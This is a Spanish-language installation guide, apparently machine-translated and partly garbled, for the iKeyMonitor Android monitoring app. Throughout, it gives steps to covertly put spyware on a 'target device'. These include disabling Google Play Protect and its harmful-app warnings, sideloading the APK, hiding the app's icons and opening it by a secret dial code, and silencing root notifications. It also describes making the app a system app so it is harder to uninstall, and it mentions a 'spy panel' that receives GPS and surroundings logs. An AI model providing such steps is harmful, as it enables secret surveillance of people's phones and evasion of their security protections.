Guía de instalación iKeyMonitor Android

Requisitos previos

Omita este paso Si no ha instalado Google Play (Por ejemplo: Para los teléfonos de China, Google Play no se instala por defecto).

Inhabilitar Google Play Protect

ajustes > google > Seguridad > dispositivo de exploración en busca de amenazas de seguridad y Mejorar la detección de aplicaciones dañinas (1,2,3)
Ajustado a "APAGADO

Desactivar la notificación de Google Play Protect

• En 7.x Android
    ajustes > Notificaciones > Google Play Store > Bloquear todo (1,2,3)
    Ajustado a "EN

• En 8.x Android
    ajustes > Aplicaciones y notificaciones > Ver todas las aplicaciones > Google Play Store > Notificaciones de aplicación > Alta prioridad (1,2,3)
    Ajustado a "APAGADO

Si ya ha instalado iKeyMonitor y visto una notificación “Desinstalación de aplicaciones dañinas", entonces con una presión prolongada Activar la notificación y la notificación a “APAGADO“.

INSTALAR

1. Permitir que la aplicación se instala de “fuentes desconocidas”

• Ir ajustes > Seguridad > Tick “Fuentes desconocidas

2. Pulse sobre el archivo descargado “iKeyMonitor-Android.apk” para instalarlo

3. Abra después de la instalación completa

Nota:
Si tu eliges "Hecho”Después de la instalación, busque y puntee en el icono iKeyMonitor en la pantalla del dispositivo para iniciar el software.

4 maneras de abrir iKeyMonitor:

Justo después de la instalación, la aplicación iKeyMonitor se pone en marcha y comienza a trabajar en un segundo plano. Los iconos que aparecen en la pantalla de inicio y la barra de notificación se puede desactivar en Asistente iKeyMonitor. Ver la guía. Para una mejor experiencia de usuario, hay 2 opciones: o bien para mantenerlos muestran en la barra de la pantalla principal y la notificación del dispositivo supervisado o no.

1. Visitar https://ikeymonitor.com/openapp con el navegador del teléfono (modo oculto)
  2. Dial PIN # 8888 * con la almohadilla de marcación de llamada (modo oculto)
  3. Toque en el icono en la barra de notificación iKeyMonitor (Visible Mode)
  4. Toque en el icono iKeyMonitor en la pantalla principal (modo visible)

4. Para el dispositivo arraigado, acceso a la raíz de Grant iKeyMonitor y convertirlo a la aplicación del Sistema

• Para el dispositivo arraigado, conceder iKeyMonitor acceso a la raíz y el cambio Notificaciones a Discapacitado en SuperSU/superusuario.

Alternativa: Si se instala magisk para erradicar el dispositivo de destino, en magia > Menú superior izquierda > ajustes > Notificaciones de superusuario, Seleccione “Ninguna”Para desactivar la notificación.

• Para el dispositivo arraigado, convertir iKeyMonitor de aplicación del sistema de iKeyMonitor - ajustes para hacer más difícil que matar o desinstalado. Reiniciar el dispositivo después de la conversión.

CONFIGURACIÓN

1. Enable "Internet/Network Service" in "Accessibility Service" and "Usage Access"

• Después de iniciar sesión, siga los diálogos emergentes para permitir iKeyMonitor en el Servicio de Accesibilidad, Acceso uso y optimización de la batería.

3. Configuración esencial para mantener iKeyMonitor ejecuta en segundo plano

• iKeyMonitor se puede desactivar / asesinados por ahorro de energía o un limpiador de tareas del sistema Android, si no configura los ajustes esenciales.
  • Ver la configuración Esenciales Ahora!

• Go to "Device Management", check if your device is connected to the spy panel and view logs after some minutes.
  • iKeyMonitor cargue todos los registros de cada 5 minutos cuando la pantalla del dispositivo está en ON. Cuando la pantalla está apagada (en espera de teléfono), solo se subirán GPS y los registros de los alrededores.
  • Compruebe la guía del usuario y Preguntas Si tiene alguna pregunta.